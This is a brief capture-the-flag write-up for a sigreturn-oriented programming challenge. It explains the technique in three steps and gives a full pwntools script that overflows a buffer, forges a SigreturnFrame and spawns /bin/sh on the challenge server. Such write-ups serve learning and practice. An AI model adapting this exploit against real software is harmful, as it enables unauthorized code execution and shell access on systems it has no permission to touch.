Tags: pwn srop 

Rating:

This was a SigROP challenge. The binary was hand-rolled assembly with an obvious overflow, but no useful gadgets.

Steps:
1.) Construct a SigReturn Frame that setups up the registers to call execve("/bin/sh", 0, 0)
2.) ROP with the SigReturn Frame, but first jump to the READ syscall so you can set RAX=15 by writing 15 bytes
3.) After writing 15 bytes jump to a SYSCALL so the SigROP occurs which will return to another SYSCALL but with everything needed for execve("/bin/sh")

```python
import pwn
import time
from IPython import embed
from icecream import ic

elf = pwn.ELF("./srop_me")
libc = elf.libc

pwn.context.binary = elf
pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])

p = elf.process()
p = pwn.remote("challs.n00bzunit3d.xyz", "38894")

frame = pwn.SigreturnFrame()
frame.rax = pwn.constants.SYS_execve
frame.rdi = elf.symbols['msg'] + len("Hello, world!!\n")
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0x402000
frame.rip = 0x401047

read_gadget = 0x40101b
syscall_gadget = 0x401047

p.sendlineafter("Hello, world!!", b"A"*0x20 + pwn.p64(read_gadget) + pwn.p64(syscall_gadget) + bytes(frame))
time.sleep(.5)
p.sendline(b"A"*(0xf-1))

p.interactive()
```

Original writeup (https://youtu.be/PT4-jBSvYxM?t=887).